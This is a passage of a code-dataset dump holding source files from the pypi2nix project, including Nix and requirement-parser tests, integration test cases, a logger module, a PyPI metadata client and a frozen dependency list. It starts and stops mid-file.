is not connected, cannot get output\")\n else:\n return get_inner_logger(inner_logger)\n else:\n raise Exception(\"Unhandled Logger implementation\", type(logger))\n\n logger = get_inner_logger(logger)\n logger.output.seek(0)\n output = logger.output.read()\n logger.output.seek(0, 2)\n return output\n" }, { "alpha_fraction": 0.6643379926681519, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 27.358489990234375, "blob_id": "5c7d8b03fda15b1cd0a3f8245cfb171f966bf215", "content_id": "b10a2cc5f8a321b3f393f1fc32a62fc71f28be9e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3006, "license_type": "permissive", "max_line_length": 89, "num_lines": 106, "path": "/unittests/test_nix.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\n\nimport pytest\n\nfrom pypi2nix.nix import EvaluationFailed\nfrom pypi2nix.nix import ExecutableNotFound\nfrom pypi2nix.nix import Nix\n\nfrom .switches import nix\n\nHERE = os.path.dirname(__file__)\n\n\n@pytest.fixture\ndef nix_instance(tmpdir, logger):\n nix_path_addition = tmpdir.mkdir(\"testpath_exists\")\n yield Nix(\n nix_path=[\"test_variable={}\".format(str(nix_path_addition))], logger=logger\n )\n\n\n@pytest.fixture\ndef dummy_derivation():\n return os.path.join(HERE, \"data/shell_environment.nix\")\n\n\n@nix\ndef test_evaluate_nix_expression_works(nix_instance):\n assert nix_instance.evaluate_expression(\"1 + 1\") == \"2\"\n\n\n@nix\ndef test_evalulate_nix_expression_respects_additions_to_nix_path(nix_instance):\n assert \"testpath_exists\" in nix_instance.evaluate_expression(\"<test_variable>\")\n\n\n@nix\ndef test_evaluate_nix_expression_raises_exception_when_executable_not_found(logger):\n nix = Nix(executable_directory=\"/does-not-exist\", logger=logger)\n with pytest.raises(ExecutableNotFound):\n nix.evaluate_expression(\"true\")\n\n\n@nix\ndef test_shell_accepts_file_path_to_run_shell_script(nix_instance, dummy_derivation):\n output = nix_instance.shell(\"echo $out\", derivation_path=dummy_derivation)\n assert \"hello\" in output\n\n\n@nix\ndef test_shell_accepts_nix_arguments(nix_instance, dummy_derivation):\n output = nix_instance.shell(\n \"echo $out\",\n derivation_path=dummy_derivation,\n nix_arguments={\"dummy_argument\": \"perl\"},\n )\n assert \"perl\" in output\n\n\n@nix\ndef test_evaluate_expression_throws_on_erroneous_expression(nix_instance):\n with pytest.raises(EvaluationFailed):\n nix_instance.evaluate_expression(\"1+\")\n\n\n@nix\ndef test_build_expression_throws_on_syntax_error(nix_instance):\n with pytest.raises(EvaluationFailed):\n nix_instance.build_expression(\"with import <nixpkgs> {}; hello(\")\n\n\n@nix\ndef test_build_expression_creates_proper_out_link(nix_instance, tmpdir):\n output_path = tmpdir.join(\"output-link\")\n nix_instance.build_expression(\n \"with import <nixpkgs> {}; hello\", out_link=str(output_path)\n )\n assert output_path.exists()\n\n\n@nix\ndef test_build_respects_boolean_arguments(nix_instance, tmpdir):\n source_path = tmpdir.join(\"test.nix\")\n with open(source_path, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"{ argument }:\",\n \"with import <nixpkgs> {};\"\n 'if lib.assertMsg argument \"Argument is false\" then hello else null',\n ]\n )\n )\n nix_instance.build(source_file=str(source_path), arguments={\"argument\": True})\n\n\n@nix\ndef test_build_expression_respects_boolean_arguments(nix_instance):\n expression = \" \".join(\n [\n \"{ argument }:\",\n \"with import <nixpkgs> {};\"\n 'if lib.assertMsg argument \"Argument is false\" then hello else null',\n ]\n )\n nix_instance.build_expression(expression, arguments={\"argument\": True})\n" }, { "alpha_fraction": 0.7310705184936523, "alphanum_fraction": 0.7415143847465515, "avg_line_length": 24.53333282470703, "blob_id": "688fe32d31ce8bd4658589fde4508ff62aeb2675", "content_id": "9b57e18a15302833752546b88e7364eb99c4d3ca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "permissive", "max_line_length": 88, "num_lines": 15, "path": "/unittests/templates.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nfrom typing import Dict\n\nimport jinja2\n\nfrom pypi2nix.path import Path\n\nHERE = Path(os.path.dirname(__file__))\n\n_templates = jinja2.Environment(loader=jinja2.FileSystemLoader(str(HERE / \"templates\")))\n\n\ndef render_template(template_path: Path, context=Dict[str, str]) -> str:\n template = _templates.get_template(str(template_path))\n return template.render(**context)\n" }, { "alpha_fraction": 0.6707317233085632, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 27.941177368164062, "blob_id": "b795b902abf717594b3d4bfb9be17145c161a3e7", "content_id": "f56c236830af02444b1b2d9df77bc6b570e36dbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 95, "num_lines": 17, "path": "/integrationtests/test_ldap.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from unittest import expectedFailure\n\nfrom .framework import IntegrationTest\n\n\n@expectedFailure\nclass LdapTestCase(IntegrationTest):\n name_of_testcase = \"ldap\"\n python_version = \"python27\"\n code_for_testing = [\"import ldap\"]\n requirements = [\"python-ldap\"]\n external_dependencies = [\"openldap\", \"cyrus_sasl\", \"openssl\"]\n\n def extra_environment(self):\n return {\n \"NIX_CFLAGS_COMPILE\": '\"-I${pkgs.cyrus_sasl.dev}/include/sasl $NIX_CFLAGS_COMPILE\"'\n }\n" }, { "alpha_fraction": 0.7325102686882019, "alphanum_fraction": 0.735939621925354, "avg_line_length": 31.399999618530273, "blob_id": "233269cac2101d8cbdc4145c08e149fabef4f72d", "content_id": "dc007c94e92aed8366d16ff546a4ddcd31aedf69", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4374, "license_type": "permissive", "max_line_length": 84, "num_lines": 135, "path": "/unittests/test_package_generator.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import venv\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.pip.virtualenv import VirtualenvPip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .package_generator import PackageGenerator\n\n\ndef test_can_generate_two_packages(package_generator: PackageGenerator) -> None:\n package_generator.generate_setuptools_package(name=\"package1\",)\n package_generator.generate_setuptools_package(name=\"package2\",)\n\n\ndef test_can_gerate_source_distribution_with_correct_name(\n package_generator: PackageGenerator,\n):\n distribution = package_generator.generate_setuptools_package(name=\"testpackage\")\n assert distribution.name == \"testpackage\"\n\n\ndef test_can_install_generated_packages(\n pip: Pip,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n target_directory: Path,\n install_target: Path,\n package_generator: PackageGenerator,\n):\n package_generator.generate_setuptools_package(name=\"testpackage\")\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"testpackage\"))\n pip.install(\n requirements,\n source_directories=[target_directory],\n target_directory=install_target,\n )\n assert \"testpackage\" in pip.freeze(python_path=[install_target])\n\n\ndef test_can_generate_packages_with_requirements(\n package_generator: PackageGenerator,\n requirement_parser: RequirementParser,\n pip: Pip,\n target_directory: Path,\n install_target: Path,\n current_platform: TargetPlatform,\n):\n package_generator.generate_setuptools_package(\n name=\"testpackage\", install_requires=[\"other-package\"]\n )\n package_generator.generate_setuptools_package(name=\"other-package\")\n requirements = RequirementSet(target_platform=current_platform)\n requirements.add(requirement_parser.parse(\"testpackage\"))\n pip.install(\n requirements,\n source_directories=[target_directory],\n target_directory=install_target,\n )\n assert \"other-package\" in pip.freeze([install_target])\n\n\ndef test_can_generate_valid_packages_with_two_runtime_dependencies(\n package_generator: PackageGenerator,\n requirement_parser: RequirementParser,\n pip: Pip,\n target_directory: Path,\n install_target: Path,\n current_platform: TargetPlatform,\n):\n package_generator.generate_setuptools_package(\n name=\"testpackage\", install_requires=[\"dependency1\", \"dependency2\"]\n )\n package_generator.generate_setuptools_package(name=\"dependency1\")\n package_generator.generate_setuptools_package(name=\"dependency2\")\n requirements = RequirementSet(target_platform=current_platform)\n requirements.add(requirement_parser.parse(\"testpackage\"))\n pip.install(\n requirements,\n source_directories=[target_directory],\n target_directory=install_target,\n )\n installed_packages = pip.freeze([install_target])\n assert \"dependency1\" in installed_packages\n assert \"dependency2\" in installed_packages\n\n\n@pytest.fixture\ndef pip(\n logger: Logger,\n current_platform: TargetPlatform,\n target_directory: Path,\n wheel_distribution_archive_path: str,\n requirement_parser: RequirementParser,\n install_target: Path,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=str(install_target),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n find_links=[str(target_directory)],\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\n@pytest.fixture\ndef target_directory(tmpdir_factory) -> Path:\n return Path(str(tmpdir_factory.mktemp(\"target-directory\")))\n\n\n@pytest.fixture\ndef install_target(tmpdir_factory) -> Path:\n return Path(str(tmpdir_factory.mktemp(\"install-target\")))\n\n\n@pytest.fixture\ndef package_generator(\n logger: Logger, target_directory: Path, requirement_parser: RequirementParser\n) -> PackageGenerator:\n return PackageGenerator(\n target_directory=target_directory,\n logger=logger,\n requirement_parser=requirement_parser,\n )\n" }, { "alpha_fraction": 0.8507462739944458, "alphanum_fraction": 0.8507462739944458, "avg_line_length": 32.5, "blob_id": "34c2f5cd3a0d22fd37bc588fd0241632e3a97faa", "content_id": "3d1542818b21382bb3ef2b86e7ab5452c213b7ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 37, "num_lines": 4, "path": "/src/pypi2nix/pip/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .exceptions import PipFailed\nfrom .implementation import NixPip\nfrom .interface import Pip\nfrom .virtualenv import VirtualenvPip\n" }, { "alpha_fraction": 0.5827658176422119, "alphanum_fraction": 0.5861707925796509, "avg_line_length": 34.35185241699219, "blob_id": "ce1df10a5155e3fb41644930b2e2340e08c8982f", "content_id": "658ab5a51ec76cb358decc6d6f1a45e05b99a274", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3818, "license_type": "no_license", "max_line_length": 100, "num_lines": 108, "path": "/src/pypi2nix/pypi.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport re\nfrom functools import lru_cache\nfrom http.client import HTTPException\nfrom typing import Optional\nfrom typing import Union\nfrom urllib.request import urlopen\n\nfrom attr import attrib\nfrom attr import attrs\nfrom packaging.version import LegacyVersion\nfrom packaging.version import Version\nfrom packaging.version import parse as parse_version\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.pypi_package import PypiPackage\nfrom pypi2nix.pypi_release import PypiRelease\nfrom pypi2nix.pypi_release import ReleaseType\nfrom pypi2nix.pypi_release import get_release_type_by_packagetype\n\n\n@attrs(frozen=True)\nclass Pypi:\n _logger: Logger = attrib()\n _index: str = attrib(default=\"https://pypi.org/pypi\")\n\n @lru_cache(maxsize=None)\n def get_package(self, name: str) -> PypiPackage:\n def get_release_type(package_type: str) -> ReleaseType:\n release_type = get_release_type_by_packagetype(package_type)\n if release_type is None:\n self._logger.warning(\n f\"Found unexpected `packagetype` entry {package_type} for package `{name}`\"\n )\n return ReleaseType.UNKNOWN\n else:\n return release_type\n\n url = f\"{self._index}/{name}/json\"\n try:\n with urlopen(url) as response_buffer:\n metadata = json.loads(response_buffer.read().decode(\"utf-8\"))\n except HTTPException:\n raise PypiFailed(\n f\"Failed to download metadata information from `{url}`, given package name `{name}`\"\n )\n releases = {\n PypiRelease(\n url=data[\"url\"],\n sha256_digest=data[\"digests\"][\"sha256\"],\n version=version,\n type=get_release_type(data[\"packagetype\"]),\n filename=data[\"filename\"],\n )\n for version, release_list in metadata[\"releases\"].items()\n for data in release_list\n }\n\n return PypiPackage(\n name=metadata[\"info\"][\"name\"],\n releases=releases,\n version=metadata[\"info\"][\"version\"],\n )\n\n def get_source_release(self, name: str, version: str) -> Optional[PypiRelease]:\n def version_tag_from_filename(filename: str) -> Union[Version, LegacyVersion]:\n extension = \"|\".join(\n map(re.escape, [\".tar.gz\", \".tar.bz2\", \".tar\", \".zip\", \".tgz\"])\n )\n regular_expression = r\"{name}-(?P<version>.*)(?P<extension>{extension})$\".format(\n name=re.escape(name), extension=extension\n )\n result = re.match(regular_expression, filename)\n if result:\n return parse_version(result.group(\"version\"))\n else:\n message = f\"Could not guess version of package from url `{filename}`\"\n self._logger.error(message)\n raise PypiFailed(message)\n\n package = self.get_package(name)\n source_releases = [\n release\n for release in package.releases\n if release.type == ReleaseType.SOURCE\n ]\n releases_for_version = (\n release\n for release in source_releases\n if parse_version(release.version) == parse_version(version)\n )\n\n for release in releases_for_version:\n return release\n else:\n releases_for_version_by_filename = (\n release\n for release in source_releases\n if version_tag_from_filename(release.filename) == parse_version(version)\n )\n for release in releases_for_version_by_filename:\n return release\n else:\n return None\n\n\nclass PypiFailed(Exception):\n pass\n" }, { "alpha_fraction": 0.6495956778526306, "alphanum_fraction": 0.671159029006958, "avg_line_length": 32.727272033691406, "blob_id": "da967a0033dcaa7282fed2386fb764110bd3a21c", "content_id": "e44f236f2a8576e6b5b77a3428d38136949554a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 371, "license_type": "no_license", "max_line_length": 83, "num_lines": 11, "path": "/integrationtests/test_connexion.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass ConnexionTestCase(IntegrationTest):\n name_of_testcase = \"connexion\"\n requirements = [\"connexion\"]\n code_for_testing = [\"import connexion\"]\n constraints = [\"clickclick == 1.2.1\", \"flake8 == 3.7.7\"]\n\n def setup_requires(self):\n return [\"flit\", \"pytest-runner\", \"setuptools-scm\", \"vcversioner\", \"flake8\"]\n" }, { "alpha_fraction": 0.726141095161438, "alphanum_fraction": 0.7302904725074768, "avg_line_length": 17.538461685180664, "blob_id": "688ea229fa39503b4872b292084e5ce5d43fd342", "content_id": "dd314646e55c5e9ebd2ef3614fff04a02d777206", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 45, "num_lines": 13, "path": "/src/pypi2nix/pypi_package.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Set\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom pypi2nix.pypi_release import PypiRelease\n\n\n@attrs\nclass PypiPackage:\n name: str = attrib()\n releases: Set[PypiRelease] = attrib()\n version: str = attrib()\n" }, { "alpha_fraction": 0.5233399271965027, "alphanum_fraction": 0.7120315432548523, "avg_line_length": 16.686046600341797, "blob_id": "de2765b34ae31429c2651a85f8584fbfac538ac8", "content_id": "de53a3a07e2c8edc3059bf33caa3e16776f496c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1521, "license_type": "no_license", "max_line_length": 36, "num_lines": 86, "path": "/requirements_frozen.txt", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "alabaster==0.7.12\nappdirs==1.4.3\nattrs==19.3.0\nBabel==2.8.0\nblack==19.10b0\nbleach==3.1.1\nbumpv==0.3.0\ncertifi==2019.11.28\ncffi==1.14.0\nchardet==3.0.4\nClick==7.0\ncoverage==5.0.3\ncryptography==2.8\ndocutils==0.16\neffect==1.1.0\nentrypoints==0.3\nfancycompleter==0.9.1\nflake8==3.7.9\nflake8-debugger==3.2.1\nflake8-unused-arguments==0.0.3\nflit==2.2.0\nflit-core==2.2.0\nhypothesis==5.6.0\nidna==2.9\nimagesize==1.2.0\nimportlib-metadata==1.5.0\nintreehooks==1.0\nisort==4.3.21\njeepney==0.4.3\nJinja2==2.11.1\njsonschema==3.2.0\nkeyring==21.1.1\nMarkupSafe==1.1.1\nmccabe==0.6.1\nmore-itertools==8.2.0\nmypy==0.761\nmypy-extensions==0.4.3\nnix-prefetch-github==2.3.2\npackaging==20.3\nParsley==1.3\npathspec==0.7.0\npdbpp==0.10.2\npkginfo==1.5.0.1\npluggy==0.13.1\npy==1.8.1\npyaml==19.4.1\npycodestyle==2.5.0\npycparser==2.20\npyflakes==2.1.1\nPygments==2.6.1\npyparsing==2.4.6\npyrepl==0.9.0\npyrsistent==0.15.7\npytest==5.3.5\npytest-cov==2.8.1\npytest-runner==5.2\npytoml==0.1.21\npytz==2019.3\nPyYAML==5.3\nreadme-renderer==24.0\nregex==2020.2.20\nrequests==2.23.0\nrequests-toolbelt==0.9.1\nSecretStorage==3.1.2\nsetupmeta==2.6.20\nsetuptools-scm==3.5.0\nsix==1.14.0\nsnowballstemmer==2.0.0\nsortedcontainers==2.1.0\nSphinx==2.4.4\nsphinxcontrib-applehelp==1.0.2\nsphinxcontrib-devhelp==1.0.2\nsphinxcontrib-htmlhelp==1.0.3\nsphinxcontrib-jsmath==1.0.1\nsphinxcontrib-qthelp==1.0.3\nsphinxcontrib-serializinghtml==1.1.4\ntoml==0.10.0\ntqdm==4.43.0\ntwine==3.1.1\ntyped-ast==1.4.1\ntyping-extensions==3.7.4.1\nurllib3==1.25.8\nwcwidth==0.1.8\nwebencodings==0.5.1\nwmctrl==0.3\nzipp==3.1.0\n" }, { "alpha_fraction": 0.6192052960395813, "alphanum_fraction": 0.620309054851532, "avg_line_length": 26.876922607421875, "blob_id": "a022e4ea9748e2f9fd8ae516535836dcaa538c55", "content_id": "d32b9cc132413b61a112eae19db2e0a7db32ede1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3624, "license_type": "no_license", "max_line_length": 76, "num_lines": 130, "path": "/src/pypi2nix/logger.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport sys\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom enum import unique\nfrom typing import Optional\nfrom typing import TextIO\n\n\nclass LoggerNotConnected(Exception):\n pass\n\n\n@unique\nclass Verbosity(Enum):\n ERROR = -1\n WARNING = 0\n INFO = 1\n DEBUG = 2\n\n\nVERBOSITY_MIN: int = min(*map(lambda v: v.value, Verbosity)) # type: ignore\nVERBOSITY_MAX: int = max(*map(lambda v: v.value, Verbosity)) # type: ignore\n\n\ndef verbosity_from_int(n: int) -> Verbosity:\n for verbosity_level in Verbosity:\n if verbosity_level.value == n:\n return verbosity_level\n if n < VERBOSITY_MIN:\n return Verbosity.ERROR\n else:\n return Verbosity.DEBUG\n\n\nclass Logger(metaclass=ABCMeta):\n @abstractmethod\n def error(self, text: str) -> None:\n pass\n\n @abstractmethod\n def warning(self, text: str) -> None:\n pass\n\n @abstractmethod\n def info(self, text: str) -> None:\n pass\n\n @abstractmethod\n def debug(self, text: str) -> None:\n pass\n\n @abstractmethod\n def set_verbosity(self, level: Verbosity) -> None:\n pass\n\n\nclass StreamLogger(Logger):\n def __init__(self, output: TextIO):\n self.output = output\n self.verbosity_level: Verbosity = Verbosity.DEBUG\n\n def warning(self, text: str) -> None:\n if self.verbosity_level.value >= Verbosity.WARNING.value:\n for line in text.splitlines():\n print(\"WARNING:\", line, file=self.output)\n\n def error(self, text: str) -> None:\n for line in text.splitlines():\n print(\"ERROR:\", line, file=self.output)\n\n def info(self, text: str) -> None:\n if self.verbosity_level.value >= Verbosity.INFO.value:\n for line in text.splitlines():\n print(\"INFO:\", line, file=self.output)\n\n def debug(self, text: str) -> None:\n if self.verbosity_level.value >= Verbosity.DEBUG.value:\n for line in text.splitlines():\n print(\"DEBUG:\", line, file=self.output)\n\n def set_verbosity(self, level: Verbosity) -> None:\n self.verbosity_level = level\n\n @classmethod\n def stdout_logger(constructor) -> StreamLogger:\n return constructor(sys.stdout)\n\n\nclass ProxyLogger(Logger):\n def __init__(self) -> None:\n self._target_logger: Optional[Logger] = None\n\n def info(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.info(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def debug(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.debug(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def warning(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.warning(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def error(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.error(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def set_verbosity(self, level: Verbosity) -> None:\n if self._target_logger is not None:\n self._target_logger.set_verbosity(level)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def set_target_logger(self, target: Logger) -> None:\n self._target_logger = target\n\n def get_target_logger(self) -> Optional[Logger]:\n return self._target_logger\n" }, { "alpha_fraction": 0.6129707098007202, "alphanum_fraction": 0.6129707098007202, "avg_line_length": 21.23255729675293, "blob_id": "309b63086d0a3949f160f5a27b382c50738d8ef8", "content_id": "b181a787fe1259297b52e3882263ce807a128af7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 956, "license_type": "no_license", "max_line_length": 74, "num_lines": 43, "path": "/scripts/run_integration_tests.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport argparse\nimport os\nimport shlex\nimport subprocess\n\nfrom repository import ROOT\n\n\ndef generator(iterable):\n yield from iterable\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--file\", default=None)\n args = parser.parse_args()\n return args.file\n\n\ndef run_tests_from_file(path: str) -> None:\n command = [\"python\", \"-m\", \"unittest\", path, \"-k\", \"TestCase\"]\n print(\"Executing test: \", \" \".join(map(shlex.quote, command)))\n subprocess.run(command, check=True)\n\n\ndef main():\n file = parse_args()\n if file:\n files = generator([file])\n else:\n files = (\n os.path.join(ROOT, \"integrationtests\", name)\n for name in os.listdir(os.path.join(ROOT, \"integrationtests\"))\n if name.startswith(\"test_\") and name.endswith(\".py\")\n )\n for path in files:\n run_tests_from_file(path)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6884422302246094, "alphanum_fraction": 0.7035176157951355, "avg_line_length": 29.615385055541992, "blob_id": "33facc41cd2e9045af648b346955d140b8aaa5f3", "content_id": "a7dac45ededc6d2af7b19b8da9be9496342548f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 77, "num_lines": 13, "path": "/integrationtests/test_rss2email.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\nfrom .framework import TestCommand\n\n\nclass Rss2EmailTestCase(IntegrationTest):\n name_of_testcase = \"rss2email\"\n code_for_testing = [\"import rss2email\"]\n requirements = [\n \"https://github.com/wking/rss2email/archive/master.zip#egg=rss2email\"\n ]\n\n def executables_for_testing(self):\n return [TestCommand(command=[\"r2e\", \"--help\"])]\n" }, { "alpha_fraction": 0.7102563977241516, "alphanum_fraction": 0.7102563977241516, "avg_line_length": 34.45454406738281, "blob_id": "e8719d8b131f46d57a00c648d1df683a89fa23ba", "content_id": "160e3ea62d90bf1320e2717aaf58d22cd19d0239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 390, "license_type": "no_license", "max_line_length": 76, "num_lines": 11, "path": "/integrationtests/test_awscli_and_requests.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\nfrom .framework import TestCommand\n\n\nclass AwscliAndRequestsTestCase(IntegrationTest):\n name_of_testcase = \"awscli_and_requests\"\n requirements = [\"awscli\", \"requests\"]\n code_for_testing = [\"import awscli\", \"import requests\"]\n\n def executables_for_testing(self):\n return [TestCommand(command=[\"aws\", \"help\"], env={\"PAGER\": \"none\"})]\n" }, { "alpha_fraction": 0.8846153616905212, "alphanum_fraction": 0.8846153616905212, "avg_line_length": 51, "blob_id": "30511410ce408ed244361e891eece3b4e6cb5578", "content_id": "fa48664281b590d3c0a4fa7fe937feb2c4bb2e44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/src/pypi2nix/external_dependencies/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .external_dependency import ExternalDependency\n" }, { "alpha_fraction": 0.7033798098564148, "alphanum_fraction": 0.70881587266922, "avg_line_length": 33.398372650146484, "blob_id": "830950d3d9ba6e65bc2744d1575f5ff854068446", "content_id": "62a0a9003910696f6ec366e079c5e18ef834c611", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4231, "license_type": "permissive", "max_line_length": 88, "num_lines": 123, "path": "/unittests/test_requirement_parser.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\nfrom parsley import ParseError\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import PathRequirement\n\nfrom .logger import get_logger_output\n\n\ndef test_parses_pip_style_url(requirement_parser):\n requirement_parser.compiled_grammar()(\n \"git+https://github.com/nix-community/pypi2nix.git\"\n ).URI_pip_style()\n\n\ndef test_parse_pip_style_requirement(requirement_parser):\n requirement_parser.compiled_grammar()(\n \"git+https://github.com/nix-community/pypi2nix.git#egg=pypi2nix\"\n ).url_req_pip_style()\n\n\ndef test_that_python_implemntation_marker_can_be_parsed(requirement_parser):\n requirement_parser.compiled_grammar()(\n 'testspec; python_implementation == \"CPython\"'\n )\n\n\n@pytest.mark.parametrize(\"path\", (\"/test/path\", \"./test/path\", \"test/path\", \"./.\"))\ndef test_that_file_path_with_leading_slash_can_be_parsed(path, requirement_parser):\n assert requirement_parser.compiled_grammar()(path).file_path() == path\n\n\n@pytest.mark.parametrize(\n \"path\", (\"#\", \"/#/\", \"/test#/\", \"#/test\", \"path/test#egg=testegg\")\n)\ndef test_that_path_with_hashpound_is_not_recognized(path, requirement_parser):\n with pytest.raises(ParseError):\n requirement_parser.compiled_grammar()(path).file_path()\n\n\ndef test_that_we_can_parse_pip_style_requirement_with_file_path(requirement_parser):\n requirement = requirement_parser.compiled_grammar()(\n \"path/to/egg#egg=testegg\"\n ).path_req_pip_style()\n assert requirement.name() == \"testegg\"\n assert requirement.path() == \"path/to/egg\"\n\n\n@pytest.mark.parametrize(\n \"line\",\n (\n \"cffi>=1.8,!=1.11.3; python_implementation != 'PyPy'\",\n \"cffi>=1.1; python_implementation != 'PyPy'\",\n \"cffi>=1.4.1; python_implementation != 'PyPy'\",\n ),\n)\ndef test_regressions_with_cryptography(\n requirement_parser: RequirementParser, line: str, logger: Logger\n) -> None:\n requirement = requirement_parser.parse(line)\n assert requirement.name() == \"cffi\"\n assert \"WARNING\" in get_logger_output(logger)\n assert \"PEP 508\" in get_logger_output(logger)\n\n\ndef test_that_path_is_parsed_to_path_requirement(requirement_parser: RequirementParser):\n requirement = requirement_parser.parse(\"local_path/egg#egg=local-path\")\n assert isinstance(requirement, PathRequirement)\n\n\ndef test_that_requirement_parser_does_not_choke_on_sys_dot_platform(\n requirement_parser: RequirementParser, logger: Logger\n):\n line = 'macfsevents ; sys.platform == \"darwin\"'\n requirement = requirement_parser.parse(line)\n assert requirement.name() == \"macfsevents\"\n assert \"WARNING\" in get_logger_output(logger)\n assert \"PEP 508\" in get_logger_output(logger)\n\n\ndef test_that_comment_is_parsed_correctly(requirement_parser: RequirementParser):\n comment_string = \"# this is a comment\"\n result = requirement_parser.compiled_grammar()(comment_string).comment()\n assert result == \"this is a comment\"\n\n\ndef test_that_comment_without_string_after_it_is_parsed_correctly(\n requirement_parser: RequirementParser,\n):\n comment_string = \"#\"\n result = requirement_parser.compiled_grammar()(comment_string).comment()\n assert result == \"\"\n\n\ndef test_that_name_requirements_can_have_comments(\n requirement_parser: RequirementParser,\n):\n line = \"requirement # comment\"\n result = requirement_parser.compiled_grammar()(line).name_req()\n assert result.name() == \"requirement\"\n\n\ndef test_that_url_req_can_have_comments(requirement_parser: RequirementParser):\n line = \"test @ https://test.url # comment\"\n result = requirement_parser.compiled_grammar()(line).url_req()\n assert result.name() == \"test\"\n\n\ndef test_that_url_req_pip_style_can_have_comments(\n requirement_parser: RequirementParser,\n):\n line = \"https://test.url#egg=test # comment\"\n result = requirement_parser.compiled_grammar()(line).url_req_pip_style()\n assert result.name() == \"test\"\n\n\ndef test_that_path_req_pip_style_can_have_comments(\n requirement_parser: RequirementParser,\n):\n line = \"/path/requirement#egg=test # comment\"\n result = requirement_parser.compiled_grammar()(line).path_req_pip_style()\n assert result.name() == \"test\"\n" }, { "alpha_fraction": 0.6782987713813782, "alphanum_fraction": 0.6859323978424072, "avg_line_length": 29.566667556762695, "blob_id": "71dc0aca93d70d1d51bcba4e7b273d8823b73ea1", "content_id": "732186d11c1b5c9f0090f37e4efcc73c86091d4c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 917, "license_type": "permissive", "max_line_length": 86, "num_lines": 30, "path": "/unittests/test_archive.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\n\nimport pytest\n\nfrom pypi2nix.archive import Archive\n\n\n@pytest.fixture(params=(\"tar\", \"zip\", \"bz2\"))\ndef 